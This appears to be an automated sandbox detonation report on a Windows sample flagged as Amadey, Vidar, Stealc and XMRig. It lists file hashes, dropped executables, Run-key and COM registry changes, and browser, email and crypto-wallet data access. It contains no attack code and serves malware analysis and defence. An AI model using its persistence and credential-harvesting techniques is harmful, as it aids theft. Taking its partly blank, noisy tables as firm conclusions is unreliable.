| SHA512 | a52c81062f02c15701f13595f4476f0a07735034fcf177b1a65b001394a816020ee791fed5afae81d51de27630b34a85efa717fe80da733556fdda8739030f49 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\personality-provider\nb_model_build_attachment_blogging_resources_and_services.json
| MD5 | c82700fcfcd9b5117176362d25f3e6f6 |
| SHA1 | a7ad40b40c7e8e5e11878f4702952a4014c5d22a |
| SHA256 | c9f2a779dba0bc886cc1255816bd776bdc2e8a6a8e0f9380495a92bb66862780 |
| SHA512 | d38e65ab55cee8fef538ad96448cd0c6b001563714fc7b37c69a424d0661ec6b7d04892cf4b76b13ddbc7d300c115e87e0134d47c3f38ef51617e5367647b217 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\personality-provider\nb_model_build_attachment_hobbies_and_leisure.json
| MD5 | bb45971231bd3501aba1cd07715e4c95 |
| SHA1 | ea5bfd43d60a3d30cda1a31a3a5eb8ea0afa142a |
| SHA256 | 47db7797297a2a81d28c551117e27144b58627dbac1b1d52672b630d220f025d |
| SHA512 | 74767b1badbd32cacd3f996b8172df9c43656b11fea99f5a51fff38c6c6e2120fae8bdd0dd885234a3f173334054f580164fdf8860c27cbcf5fb29c5bcdc060d |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n9vxbo99.default-release\personality-provider\nb_model_build_attachment_travel.json
| MD5 | 48139e5ba1c595568f59fe880d6e4e83 |
| SHA1 | 5e9ea36b9bb109b1ecfc41356cd5c8c9398d4a78 |
| SHA256 | 4336ac211a822b0a5c3ce5de0d4730665acc351ee1965ea8da1c72477e216dfa |
| SHA512 | 57e826f0e1d9b12d11b05d47e2f5ae4f5787537862f26e039918cb14faff4bc854298c0b7de3023e371756a331c0f3ee1aa7cebbbf94ec70cdfc29e00a900ed1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\bookmarkbackups\bookmarks-2024-06-17_11_9T+heVKkjRo9zv0pmK6E4A==.jsonlz4
| MD5 | 00828e91cb77386c222fd16e40d181d5 |
| SHA1 | aadc322eb7f8b51186065c5a0660f97a4fa592dd |
| SHA256 | b1556f3022bcf3ffd1490f87bb843dbac4d89647c567dbcd445fb3badeee3d26 |
| SHA512 | fbbbf707ea3bb6f077a83c6588f0e81bc785fcf5702c52d57eef6c981208af1699c65a87d0ec600c6e622fe6613dff2ad786784fdf763885449846152ecbbe89 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\SiteSecurityServiceState.txt
| MD5 | 894d04593144c4db32615cd5db70d521 |
| SHA1 | c3085b76285dfcd93803be133dc057351cfbe633 |
| SHA256 | 3aa36775bff42ea6a78d0d31ddc765aa77364c0bd9da9d1fbfcbca3233858f33 |
| SHA512 | ebcd45a0032262c02b2b176a0ced6c59a80ddc5b2654777538a002a55293363aa27b4f72d7c021765bfa7b416af3537e938b8d039996e94448333297b1ff0a8d |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\AlternateServices.txt
| MD5 | ba5634494ab869f6ef62b449f0b4fbb5 |
| SHA1 | 8479ba4159ba883a7c27d242e0274cd73bbc0224 |
| SHA256 | 77fae7898fd8d27e5d3a557f8db948949b49a6ee17d75190671d38e2df59820d |
| SHA512 | 01949ae8858058908b2dec294d88d4a7939b59046b255312b789c6f6fa4679782a6554ae7250d1cfdf913d894c47ee83bd913645e5d57f569300d4d9ac518a4a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\extensions.json.tmp
| MD5 | f666e9a2022012dd755de3cd62f7e48a |
| SHA1 | b8cbe191b4993f661aba932632fc9f9e71370b8c |
| SHA256 | f61565f679439fa725b50389ef83a4e84370d1f6668f1c0bf4534f5732bd0550 |
| SHA512 | a06f13dd53078886501ef9b26176f8ad12cb13cebd9616e727adcd377a693649a7f69b2d418a25fe3bce935e03f83ed5522d3ad1f161df480dddd046973c48d9 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs-1.js
| MD5 | 91c1da42219a2fb2e7f9103ea13dc88b |
| SHA1 | 122eb67b7123df1b6649d526d3e86158f72a4f32 |
| SHA256 | 44ec520567c08938c12d5de18c1931428a3d96fa5f406d7f6dff30f00b1b294d |
| SHA512 | 01e1805b0884346aca62adfddad48d5284c8a8c5b900ffedd14e27534482b95b74b4b71c22da11f67758c8401bdb52dd43f660db3dffa1db570cd9a4940b14e9 |
C:\Users\Admin\AppData\Local\Temp\2b3a32ff
| MD5 | 3e3b6508df3bd06454d63864a53b1eb6 |
| SHA1 | 6a2ff007b89468ae4e2dfcd2786876fd3447c98a |
| SHA256 | 096a37de7aeacdc8bde78c9b75f7bef3c64263eaec2c93c4e0f602c009e77f60 |
| SHA512 | bee95f3b2dbb6407b0f3a5df40d83c1a1aa6821d29efa75f33958821b5ff66882a3c57d1d332b365d75198ed21aff0339d1cf4359a0d6e7d4f1e46cecc32910e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 18:26
Reported
2024-06-17 18:47
Platform
win10v2004-20240611-en
Max time kernel
1196s
Max time network
1200s
Command Line
Signatures
Amadey
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stealc
Vidar
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dcom.au3 | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Suspicious use of SetThreadContext
Checks installed software on the system
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Watcher Com SH.job | C:\Windows\SysWOW64\ftp.exe | N/A |
| File created | C:\Windows\Tasks\TWI Cloud Host.job | C:\Windows\SysWOW64\ftp.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\AAKEGDAKEH.exe | N/A |
| N/A | N/A | C:\ProgramData\DGDBAKKJKK.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /autoplay" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ThreadingModel = "Both" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\Microsoft.SharePoint.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\SysWow64\\shell32.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\Microsoft.SharePoint.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileCoAuth.exe\"" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\INPROCSERVER32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.220.1024.0005\FileSyncConfig.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\FileSyncShell.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.220.1024.0005\\amd64\\FileSyncShell64.dll" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000_Classes\WOW6432Node\CLSID\{6bb93b4e-44d8-40e2-bd97-42dbcf18a40f}\LocalServer32 | C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe | N/A |
